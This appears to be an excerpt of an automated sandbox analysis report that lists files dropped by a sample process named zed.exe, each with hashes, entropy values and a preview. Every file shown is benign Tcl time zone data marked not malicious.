                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8755
                                                                                                                                                                                                                                            Entropy (8bit):3.8521303835918115
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:CuS6mjvZk53mtw+N6IkWq/WHQlb/RYRWVIKr7cRRL:26jFOzN6IkWq/WHQt/RY4yP
                                                                                                                                                                                                                                            MD5:2F9983FE6248F3BF18ADE00192F4B458
                                                                                                                                                                                                                                            SHA1:73F7302C914E442FC50DD4BFF3C57FD310E6455C
                                                                                                                                                                                                                                            SHA-256:D7C5CB477A591931FF03C794C84EDB2319760C0B70047B325382F211E28648E3
                                                                                                                                                                                                                                            SHA-512:B1F66008F2B62D4E1B59ED1A78A9E4F5D06BE074EB3B2466BDE3C9ED98DE96AD03FACDB8EDA6EE8F8EE890860DE6011F2BB364DE8C1276B31F37C9C525F4EC3F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tijuana) {.. {-9223372036854775808 -28084 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1451667600 -28800 0 PST}.. {-1343062800 -25200 0 MST}.. {-1234803600 -28800 0 PST}.. {-1222963200 -25200 1 PDT}.. {-1207242000 -28800 0 PST}.. {-873820800 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-761677200 -28800 0 PST}.. {-686073600 -25200 1 PDT}.. {-661539600 -28800 0 PST}.. {-504892800 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}.. {-355330800 -28800 0 PST}.. {-337186800 -25200 1 PDT}.. {-323881200 -28800 0 PST}.. {-305737200 -25200 1 PDT}.. {-292431600 -28800 0 PST}.. {-283968000 -28800 0 PST}.. {189331200 -28800 0 PST}.. {19
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11248
                                                                                                                                                                                                                                            Entropy (8bit):3.8061065077303926
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lBew85RnK1a8phYBNXEtCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:lBq5RnK1a8phYTXEItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:0D906EC3F658730131A65C5A770D885F
                                                                                                                                                                                                                                            SHA1:BFA72C43BCE0F37F795E974457FBE4A664687B38
                                                                                                                                                                                                                                            SHA-256:5A98C6BEDDA4DF608051D702A8E037093A8068E1B85F8F55D42B4468F45662A5
                                                                                                                                                                                                                                            SHA-512:CC634DAF4EEC7F57E3AB0C20D891380A7F96DE79602A7B57C6C2BF229DD76A69B399A689FA6D0675380B1432C2115B0C8577DC49C3C9E567A08CAD6FCC3599BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Toronto) {.. {-9223372036854775808 -19052 0 LMT}.. {-2366736148 -18000 0 EST}.. {-1632070800 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1609441200 -18000 0 EST}.. {-1601753400 -14400 1 EDT}.. {-1583697600 -18000 0 EST}.. {-1567357200 -14400 1 EDT}.. {-1554667200 -18000 0 EST}.. {-1534698000 -14400 1 EDT}.. {-1524074400 -18000 0 EST}.. {-1503248400 -14400 1 EDT}.. {-1492365600 -18000 0 EST}.. {-1471798800 -14400 1 EDT}.. {-1460916000 -18000 0 EST}.. {-1440954000 -14400 1 EDT}.. {-1428861600 -18000 0 EST}.. {-1409504400 -14400 1 EDT}.. {-1397412000 -18000 0 EST}.. {-1378054800 -14400 1 EDT}.. {-1365962400 -18000 0 EST}.. {-1346605200 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-1238954400
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.864308662322047
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RRKl290ppv:MByMYbpwt290V90b
                                                                                                                                                                                                                                            MD5:21D152A2359A4EFDE6DCC304F16096F3
                                                                                                                                                                                                                                            SHA1:961B3CFB351615604981114A115D396D1F2006A2
                                                                                                                                                                                                                                            SHA-256:46A236EC38F3A122D414208328A462B2A937392ECC6C55F673FB7A402F118D96
                                                                                                                                                                                                                                            SHA-512:04A2AD6DDC2E7B0D3F95DA1C731FF553F8CBC0DD6BDFC36FB2EDCE755612103E3B4EA6F3AB7FE63CA60976538EFABF40827539DFC35B7E83129BD48471FE514B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Tortola) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9815
                                                                                                                                                                                                                                            Entropy (8bit):3.8481935495337356
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:sOR864CjSAG5a9bFzN6IkWq/WHQt/RY4yP:sO664CjSAGYbGBt/M
                                                                                                                                                                                                                                            MD5:9423BC81647BC4C37888860CE0518BBB
                                                                                                                                                                                                                                            SHA1:37E6E6554576D1DD36C3494EAF0BD169003D870D
                                                                                                                                                                                                                                            SHA-256:00B5FB8F37DFF43925C501AEAB039F39F058E002572C4203286317046CC1D700
                                                                                                                                                                                                                                            SHA-512:1830CA2B62B7CA6EEB5A924D2148925DF7DD87A7B93B21F4F023E4678EF42DC20BFF57F702923E10F4382FE6757323D21414D094E99FEEB43316DE4A7E5A909E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Vancouver) {.. {-9223372036854775808 -29548 0 LMT}.. {-2713880852 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-747237600 -25200 1 PDT}.. {-733935600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-4
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.914983069791254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290RXgr490ppv:MByMYbpwt290xg090b
                                                                                                                                                                                                                                            MD5:9F7DA15BE387B8F7DEC5DFFE069F3505
                                                                                                                                                                                                                                            SHA1:D298B963B0048E9ECA3BC7B85248506AB1388479
                                                                                                                                                                                                                                            SHA-256:561D9D04B0CE0F96A9C351C7D5C30AA1D5A42A3D70066CD9AF0DA6CBC5388DBE
                                                                                                                                                                                                                                            SHA-512:606C2A918633C74BD2954D39B00EFA2CD9DA852BC7034F129A04258A65DC74942FA0826E9BC6E4433926E7F1375612554B04845077E434D0CD3BD15832DC6B95
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Virgin) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2971
                                                                                                                                                                                                                                            Entropy (8bit):3.9652694533791917
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5CeFvmpn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5BmCKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                                            MD5:2F2D39B5FB844E170FA7B6AF11B948CA
                                                                                                                                                                                                                                            SHA1:3D89672134D979FCF65225A58249380D9C8A4A65
                                                                                                                                                                                                                                            SHA-256:8E0BC71BD7146145DDE3C064AE205DF08124FE2402853A9655B0EB799E90F31F
                                                                                                                                                                                                                                            SHA-512:6C046D1133C8CCF697C8FB553A1F539948F71FA80BA447B87AA8D1D1D7113B32A6B764C5C1734C615319A27961B6116FCA087EB571869119BE87656FCA351498
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Whitehorse) {.. {-9223372036854775808 -32412 0 LMT}.. {-2188997988 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9695
                                                                                                                                                                                                                                            Entropy (8bit):3.8209220355628766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pOEhc8/rvNZONqXXyIjNA604qSScBgN+4ctDzIVQ/c/3hNxTh:pY8DvbO+A604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:E8DB00D2B99B308018F4F5E48AC47C3A
                                                                                                                                                                                                                                            SHA1:8841467CB264DC9F87FABAADBE90EE2C8DACC80F
                                                                                                                                                                                                                                            SHA-256:F3FC5F6D93D1D9EB0F3DED33873F33C47F841797D96439966F8E0A5A189941FA
                                                                                                                                                                                                                                            SHA-512:5D684B07332ED53F9F8CB71FFF3B6D0F848426A5E4D9E7DA84E49E358C666F1C3BB9CF21352D939B35B558FC691839E24BC84656317F73C768B474AF5AC480EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Winnipeg) {.. {-9223372036854775808 -23316 0 LMT}.. {-2602258284 -21600 0 CST}.. {-1694368800 -18000 1 CDT}.. {-1681671600 -21600 0 CST}.. {-1632067200 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1029686400 -18000 1 CDT}.. {-1018198800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-746035200 -18000 1 CDT}.. {-732733200 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620755200 -18000 1 CDT}.. {-607626000 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8683
                                                                                                                                                                                                                                            Entropy (8bit):3.957710943557426
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:po1acs6yyyxC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:p4acsW9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:18EC35FCEC15CE9304818E22222411EF
                                                                                                                                                                                                                                            SHA1:F4A04B3E2B5F55C9582F578C3142E706C4EB6BD6
                                                                                                                                                                                                                                            SHA-256:79B44F245D86A4EC299D1A9A2EDB2AB92D50AB5A7C1C03759D283AC4070F9005
                                                                                                                                                                                                                                            SHA-512:40AC47AC278DF22C7ECFF568456E7C3767B38701B9A2E2639C2201DC53CDD794CF7521BCB773A8AF2A8D4A034D3BBD35BF9788FB5B4E4D51A7A139B3B3353479
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yakutat) {.. {-9223372036854775808 52865 0 LMT}.. {-3225223727 -33535 0 LMT}.. {-2188953665 -32400 0 YST}.. {-883580400 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-757350000 -32400 0 YST}.. {-31503600 -32400 0 YST}.. {-21474000 -28800 1 YDT}.. {-5752800 -32400 0 YST}.. {9975600 -28800 1 YDT}.. {25696800 -32400 0 YST}.. {41425200 -28800 1 YDT}.. {57751200 -32400 0 YST}.. {73479600 -28800 1 YDT}.. {89200800 -32400 0 YST}.. {104929200 -28800 1 YDT}.. {120650400 -32400 0 YST}.. {126702000 -28800 1 YDT}.. {152100000 -32400 0 YST}.. {162385200 -28800 1 YDT}.. {183549600 -32400 0 YST}.. {199278000 -28800 1 YDT}.. {215604000 -32400 0 YST}.. {230727600 -28800 1 YDT}.. {247053600 -32400 0 YST}.. {262782000 -28800 1 YDT}.. {278503200 -32400 0 YST}.. {294231600 -28800 1 YDT}.. {30995
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7737
                                                                                                                                                                                                                                            Entropy (8bit):3.8656193813344064
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:42GaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:uPlLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:A7606AE597027C26BC90702B2BCC80E9
                                                                                                                                                                                                                                            SHA1:7B2AB2E0A23B8D770D1305A171DBCCE2D471EF2F
                                                                                                                                                                                                                                            SHA-256:B33838F12640C64BA4F10F50657EC4D8D5B30FD226DA4ACA21B169B53AD30576
                                                                                                                                                                                                                                            SHA-512:B18711B4110D6DB0CC7A6EF66639E1B38323F0B61DA4F5287A51BC9EC8534133568C6D3E4F18F6328564DAD291E0CA707768DE4478DD502A40FFD189C08114A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yellowknife) {.. {-9223372036854775808 0 0 -00}.. {-1104537600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):478
                                                                                                                                                                                                                                            Entropy (8bit):4.205595904143294
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2L09xSDm2OHE5QMFUH+KNUoTVsBEE0ZZICxZbDtVby:MB862LcUmdHE5QMFi+KdTVPZIwXDy
                                                                                                                                                                                                                                            MD5:7D8132A23238C14CCEDD520BBEB49F77
                                                                                                                                                                                                                                            SHA1:A8BAE9269DAA2AC535B292E1AE8632B451A0BBA5
                                                                                                                                                                                                                                            SHA-256:04247ACB2B4FA126D13F4573FF74D15A89CF42B2C5CD7E688D5BB1C1FD3972BF
                                                                                                                                                                                                                                            SHA-512:74FCB14037B0AE11A95B036791D69037590F8EC7F09D90A866E6A6CAAD6D58E4EC3723A3BB356FBF0E25ED1239A5820A8513EBF6653578E4BFB8988D6D20EF13
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Casey) {.. {-9223372036854775808 0 0 -00}.. {-31536000 28800 0 +08}.. {1255802400 39600 0 +11}.. {1267714800 28800 0 +08}.. {1319738400 39600 0 +11}.. {1329843600 28800 0 +08}.. {1477065600 39600 0 +11}.. {1520701200 28800 0 +08}.. {1538856000 39600 0 +11}.. {1552752000 28800 0 +08}.. {1570129200 39600 0 +11}.. {1583596800 28800 0 +08}.. {1601740860 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                                                                                            Entropy (8bit):4.360007144607037
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2L0mDm2OHEfwz0/MVSYyF/KZ7VoX/MVSYyF/VpVQVF9RXhNXSMVSYy6:MB862LVmdHEIjsF/KZOksF/Vp6v9RRFl
                                                                                                                                                                                                                                            MD5:97AA556F7EF06786B76316133794F4E9
                                                                                                                                                                                                                                            SHA1:B3CDA284DE80987B954E2CC9BFA3ED33462CDD4F
                                                                                                                                                                                                                                            SHA-256:2F36D2E13D7E251322B7A7B30F39645393525CEB49A2B5C26F27797F2AAF4D7F
                                                                                                                                                                                                                                            SHA-512:14C6F17252C2AC89D86FE00BD8A8934D627C85478B0AB08AB6237988922D18616B00878498FFFC0E1978308BC6D775E2DC3ADCEF827AB0A06B214BE4DDABAB52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Davis) {.. {-9223372036854775808 0 0 -00}.. {-409190400 25200 0 +07}.. {-163062000 0 0 -00}.. {-28857600 25200 0 +07}.. {1255806000 18000 0 +05}.. {1268251200 25200 0 +07}.. {1319742000 18000 0 +05}.. {1329854400 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):214
                                                                                                                                                                                                                                            Entropy (8bit):4.938579775653117
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/2L0/3Zp5/4pv:MByMdNXiU5t2Lkwv
                                                                                                                                                                                                                                            MD5:CC22302B9FAE52E36A2A35C0361E774B
                                                                                                                                                                                                                                            SHA1:45CFD95A5821C4C4FDF2E1519F08029FF0BE664B
                                                                                                                                                                                                                                            SHA-256:96F2AB9A9FFCD10598FDF105F68460CC4B4EBC1F18054D1BC8E39DF6AD24D1AC
                                                                                                                                                                                                                                            SHA-512:FC9084D7B16EAA985681762F2658D32C77EE186D8D3C7225093CC5CB4A6AEB74A3D0A41A904EB6C8AEF7DB110A89497BAFAF811BBC26103F96E5E1D4D4E1002A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Antarctica/DumontDUrville) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8447
                                                                                                                                                                                                                                            Entropy (8bit):3.850137279218428
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:s1qigkx6WsYyS391QiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:s1q05h1QiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:81C612A1544910544173687C416841C6
                                                                                                                                                                                                                                            SHA1:4A707B403F0B9556A3D3D50B08BE0F56660F3F0B
                                                                                                                                                                                                                                            SHA-256:C4EA7F1C0B5A0FAE653419F1C6D058BDDD745A3CDBA11900005C157DF23DDC01
                                                                                                                                                                                                                                            SHA-512:122E2DC3D8D61CCDB83E03C9487DD29AABE7AB3F71FE4F6315209AF0BBCFD01FBDC3A1E3F6D910FB0D690378DF852170A9819D8C1EF96BE6BC8C0811BFB453A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Macquarie) {.. {-9223372036854775808 0 0 -00}.. {-2214259200 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1669892400 39600 0 AEDT}.. {-1665388800 36000 0 AEST}.. {-1601719200 0 0 -00}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {28932480
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.7511104559982
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEzyeyFNMXGm2OHvavFeVU/VPKVVFSTVF9svUX0VQr:SlSWB9eg/2L0zyfXDm2OHEVy/Ur9s/Vg
                                                                                                                                                                                                                                            MD5:7A2AD9BD8F8DEE5C600CABF2D5E9D07B
                                                                                                                                                                                                                                            SHA1:CF5D230A29946B7FA3ECD8EB99F1EF1BF0FA5B50
                                                                                                                                                                                                                                            SHA-256:ACA533B8BC82296373EDEC82F6E0AA45A34D817C7C18FF5E8E94B81C0BD30259
                                                                                                                                                                                                                                            SHA-512:95F8FA68735E88AB15C403191928FA4AA5D1628453BE64B87EE7E8DF9F35FB5DA74A3CED5F5289A13D84A8A12BBB86734E578059CA8B6405399CFF5E33C9384C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Mawson) {.. {-9223372036854775808 0 0 -00}.. {-501206400 21600 0 +06}.. {1255809600 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.880387042335617
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0z6/fy:MByMdTiYt2LrK
                                                                                                                                                                                                                                            MD5:88EE32AE5C538AEBFDE2D1D944ED5B2B
                                                                                                                                                                                                                                            SHA1:55E7234E6FFF298182A6C8889A9F506CDCE7C959
                                                                                                                                                                                                                                            SHA-256:E9D99293C5B275D8E0D7B066084177EDF670D5B52B81E87608BAB02025F33155
                                                                                                                                                                                                                                            SHA-512:45A3EA146CA719BA6F22E99EAA57AC1DED1C762E19BDFBA176E5FEAC36EC58586F771572DD16ACE09E660F97DEB91A701BA1B1F1AEF3BD8688F3451C0772420A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/McMurdo) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2613
                                                                                                                                                                                                                                            Entropy (8bit):3.6082359166067905
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5fzJS6S4wRSenSOaf7HSKSkSqS7STslSmSMSCSxygSiXS/SrS+S9SfShS7SoSlSL:jdeRtnxaf7HlPlgiot7JC/Xk8NWse4rf
                                                                                                                                                                                                                                            MD5:BDFA5908E735F866FEC16F6B481AD385
                                                                                                                                                                                                                                            SHA1:524AEE21BB97D923A8812A5722AF2FEA43B4D971
                                                                                                                                                                                                                                            SHA-256:1637381A20E9D5C6A530F110BDB08D9515E675C9206F000407D8511074948E61
                                                                                                                                                                                                                                            SHA-512:3D65C7941BA15A698264848F9B6F43ED5B63D4CF86D495334E8E1DC381D63435E9424BBBC389229693D20044FDB8425A7CC805AB5EA055F59D3E0DD4C7AC2A28
                                                                                                                                                                                                                                            Malicious:false
